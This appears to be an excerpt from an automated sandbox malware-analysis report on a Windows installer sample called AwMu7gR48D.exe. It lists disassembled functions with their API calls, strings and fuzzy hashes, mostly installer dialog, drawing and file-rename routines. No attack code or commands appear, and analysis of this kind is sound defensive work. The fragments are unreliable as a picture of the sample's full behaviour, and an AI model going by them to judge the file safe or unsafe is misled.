                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: FileFindFirst
                                                                              • String ID:
                                                                              • API String ID: 1974802433-0
                                                                              • Opcode ID: 86462296798bcc5c7116dc0b8927a48604f8bac83b6720eb84ded3fe255ec0fc
                                                                              • Instruction ID: 8315facf8ced128c6c50566814b57074d619fda0e5ca52ae4c33e0c7423f4127
                                                                              • Opcode Fuzzy Hash: 86462296798bcc5c7116dc0b8927a48604f8bac83b6720eb84ded3fe255ec0fc
                                                                              • Instruction Fuzzy Hash: E8F0ECB2704111AFD710EB749D49AFE7778DB11324F20057BE645F20C1D6B88A45DB2A
                                                                              APIs
                                                                              • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041C4
                                                                              • GetDlgItem.USER32(00000000,000003E8), ref: 004041D8
                                                                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041F6
                                                                              • GetSysColor.USER32(?), ref: 00404207
                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404216
                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404225
                                                                              • lstrlenA.KERNEL32(?), ref: 00404228
                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404237
                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040424C
                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004042AE
                                                                              • SendMessageA.USER32(00000000), ref: 004042B1
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004042DC
                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040431C
                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 0040432B
                                                                              • SetCursor.USER32(00000000), ref: 00404334
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 0040434A
                                                                              • SetCursor.USER32(00000000), ref: 0040434D
                                                                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404379
                                                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040438D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                              • String ID: : Completed$N
                                                                              • API String ID: 3103080414-2140067464
                                                                              • Opcode ID: feecafc40baf01a00ddfc5a4ad2d6f47f6ba1c3b7388df2095feb28ad013f924
                                                                              • Instruction ID: 7162b40555158b22622c6e9d00efc6f9eaf6d98589edfbec15a783eb0e256f30
                                                                              • Opcode Fuzzy Hash: feecafc40baf01a00ddfc5a4ad2d6f47f6ba1c3b7388df2095feb28ad013f924
                                                                              • Instruction Fuzzy Hash: 4E61A4B1A40205BFDB109F61CD45F6A7B69FB84704F00803AFB05BA2D1C7B8A951CF99
                                                                              APIs
                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                              • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                              • String ID: F
                                                                              • API String ID: 941294808-1304234792
                                                                              • Opcode ID: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
                                                                              • Instruction ID: d756f8073455ec7f94eaaa006bac723f94b68f9cc4de0a6a70f3062e944f429a
                                                                              • Opcode Fuzzy Hash: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
                                                                              • Instruction Fuzzy Hash: 6E419B71804249AFCF058FA4CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D2F,?,?), ref: 00405BCF
                                                                              • GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405BD8
                                                                                • Part of subcall function 00405A2D: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A3D
                                                                                • Part of subcall function 00405A2D: lstrlenA.KERNEL32(00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A6F
                                                                              • GetShortPathNameA.KERNEL32(?,00421E98,00000400), ref: 00405BF5
                                                                              • wsprintfA.USER32 ref: 00405C13
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405C4E
                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C5D
                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C95
                                                                              • SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405CEB
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405CFC
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D03
                                                                                • Part of subcall function 00405AC8: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\AwMu7gR48D.exe,80000000,00000003), ref: 00405ACC
                                                                                • Part of subcall function 00405AC8: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AEE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                              • String ID: %s=%s$[Rename]
                                                                              • API String ID: 2171350718-1727408572
                                                                              • Opcode ID: fa16ef9a339b69213ae22a03f48f65898cca3967a232a53d2c4426af25c81478
                                                                              • Instruction ID: 318577f01edad599db78de103440226658cd26d488467381f1a5ad924793321f
                                                                              • Opcode Fuzzy Hash: fa16ef9a339b69213ae22a03f48f65898cca3967a232a53d2c4426af25c81478
                                                                              • Instruction Fuzzy Hash: DC311331605B196BD2206B65AC49F6B3A6CDF45754F14053BFA01F72D2E63CAC018EBD
                                                                              APIs
                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\AwMu7gR48D.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004061F1
                                                                              • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004061FE
                                                                              • CharNextA.USER32(?,"C:\Users\user\Desktop\AwMu7gR48D.exe",76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406203
                                                                              • CharPrevA.USER32(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406213
                                                                              Strings
                                                                              • "C:\Users\user\Desktop\AwMu7gR48D.exe", xrefs: 004061D5
                                                                              • *?|<>/":, xrefs: 004061E1
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040619A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Char$Next$Prev
                                                                              • String ID: "C:\Users\user\Desktop\AwMu7gR48D.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 589700163-116931803
                                                                              • Opcode ID: cc2015c7b969e01208aad92a9e3b8c758494e26085fc8624e700c096258e22ae
                                                                              • Instruction ID: ca9b47fb282156c43c251839f6001ffd27a0cb8481c2ab4f175210ee2844123a
                                                                              • Opcode Fuzzy Hash: cc2015c7b969e01208aad92a9e3b8c758494e26085fc8624e700c096258e22ae
                                                                              • Instruction Fuzzy Hash: 0911046180839169FB3216244C44B7B7F898F5B760F1A44BFE8D6722C3C67C5C62866E
                                                                              APIs
                                                                              • GetWindowLongA.USER32(?,000000EB), ref: 00404074
                                                                              • GetSysColor.USER32(00000000), ref: 00404090
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040409C
                                                                              • SetBkMode.GDI32(?,?), ref: 004040A8
                                                                              • GetSysColor.USER32(?), ref: 004040BB
                                                                              • SetBkColor.GDI32(?,?), ref: 004040CB
                                                                              • DeleteObject.GDI32(?), ref: 004040E5
                                                                              • CreateBrushIndirect.GDI32(?), ref: 004040EF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                              • String ID:
                                                                              • API String ID: 2320649405-0
                                                                              • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                              • Instruction ID: becbdb48d67c78dbb8c9c091cdbe424430cb8bef044b76b3398d9101d9dbd489
                                                                              • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                              • Instruction Fuzzy Hash: 86215071904704ABCB219F68DD48B4BBBF8AF41714B048A29EA96B26E0C734E904CB65
                                                                              APIs
                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040493C
                                                                              • GetMessagePos.USER32 ref: 00404944
                                                                              • ScreenToClient.USER32(?,?), ref: 0040495E
                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404970
                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404996
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Send$ClientScreen
                                                                              • String ID: f
                                                                              • API String ID: 41195575-1993550816
                                                                              • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                              • Instruction ID: 39a8229da7402e88b879503ea9069683dc6a956defdeaab739565ccd09fe5115
                                                                              • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                              • Instruction Fuzzy Hash: F3014071D00219BADB01DBA4DC85FFFBBBCAF55711F10412BBA11B61C0D7B869058BA5
                                                                              APIs
                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C7C
                                                                              • MulDiv.KERNEL32(0007A328,00000064,0007A32C), ref: 00402CA7
                                                                              • wsprintfA.USER32 ref: 00402CB7
                                                                              • SetWindowTextA.USER32(?,?), ref: 00402CC7
                                                                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD9
                                                                              Strings
                                                                              • verifying installer: %d%%, xrefs: 00402CB1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                              • String ID: verifying installer: %d%%
                                                                              • API String ID: 1451636040-82062127
                                                                              • Opcode ID: 8cc8d962d8a99aef7830ba12bdb56859a6c3448b551b59a443d52a8a404c13af
                                                                              • Instruction ID: 60d807589532a1750165d7633efe1ba379d0dd74474c58c1bab17da8cefdfa8e
                                                                              • Opcode Fuzzy Hash: 8cc8d962d8a99aef7830ba12bdb56859a6c3448b551b59a443d52a8a404c13af
                                                                              • Instruction Fuzzy Hash: DA011271944209FBEF209F60DD09EEE37A9EB04304F008039FA06B92D0D7B99995CF59
                                                                              APIs
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040278A
                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027A6
                                                                              • GlobalFree.KERNEL32(?), ref: 004027E5
                                                                              • GlobalFree.KERNEL32(00000000), ref: 004027F8
                                                                              • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402810
                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402824
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                              • String ID:
                                                                              • API String ID: 2667972263-0
                                                                              • Opcode ID: 3fc906cc5814f1f80ca93e9dadef5c7fad5cafe1ef7802143d47ec90486de439
                                                                              • Instruction ID: 6a21e90f7c3239ff032d316014871365707a2127fc9d4c87d4a28567e6836d84
                                                                              • Opcode Fuzzy Hash: 3fc906cc5814f1f80ca93e9dadef5c7fad5cafe1ef7802143d47ec90486de439
                                                                              • Instruction Fuzzy Hash: 9B21C071C00124BBCF216FA5DD89DAE7B79EF05364F14423AF914762E0C6784D008FA8
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(Solidariseringerne Setup: Completed,Solidariseringerne Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404732,000000DF,00000000,00000400,?), ref: 004048B5
                                                                              • wsprintfA.USER32 ref: 004048BD
                                                                              • SetDlgItemTextA.USER32(?,Solidariseringerne Setup: Completed), ref: 004048D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                              • String ID: %u.%u%s%s$Solidariseringerne Setup: Completed
                                                                              • API String ID: 3540041739-3673876184
                                                                              • Opcode ID: fa3760b7cc8f97072af816aff5d6cd3f5b0d901f8ded19e577a8610c70623aa0
                                                                              • Instruction ID: e2544e14f383b0e553931f5ad3d2c5e69aaccc6a02b7144a1c376111f1efcf8d
                                                                              • Opcode Fuzzy Hash: fa3760b7cc8f97072af816aff5d6cd3f5b0d901f8ded19e577a8610c70623aa0
                                                                              • Instruction Fuzzy Hash: 2B11E473A041283BDB0076699C42EAF3288DB81374F254637FB65F21D1E979DC1286A8
                                                                              APIs
                                                                              • GetDC.USER32(?), ref: 00401D98
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                                              • CreateFontIndirectA.GDI32(0040A7F0), ref: 00401E1A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                              • String ID:
                                                                              • API String ID: 3808545654-0
                                                                              • Opcode ID: 34073e52274d0eea5c5fbf1d3db0759766414d75607053c18096eba5d79a5540
                                                                              • Instruction ID: 962fd9b87f23d05f09829d6e62e81eb88b122f60c97e2af10dcf53a19e6500d2
                                                                              • Opcode Fuzzy Hash: 34073e52274d0eea5c5fbf1d3db0759766414d75607053c18096eba5d79a5540
                                                                              • Instruction Fuzzy Hash: B0015272948340AFE7006BB0AE49F997FF4A715305F108479F241B62E2C67954569F3E
                                                                              APIs
                                                                              • GetDlgItem.USER32(?), ref: 00401D3F
                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                                              • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                                              • DeleteObject.GDI32(00000000), ref: 00401D8A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                              • String ID:
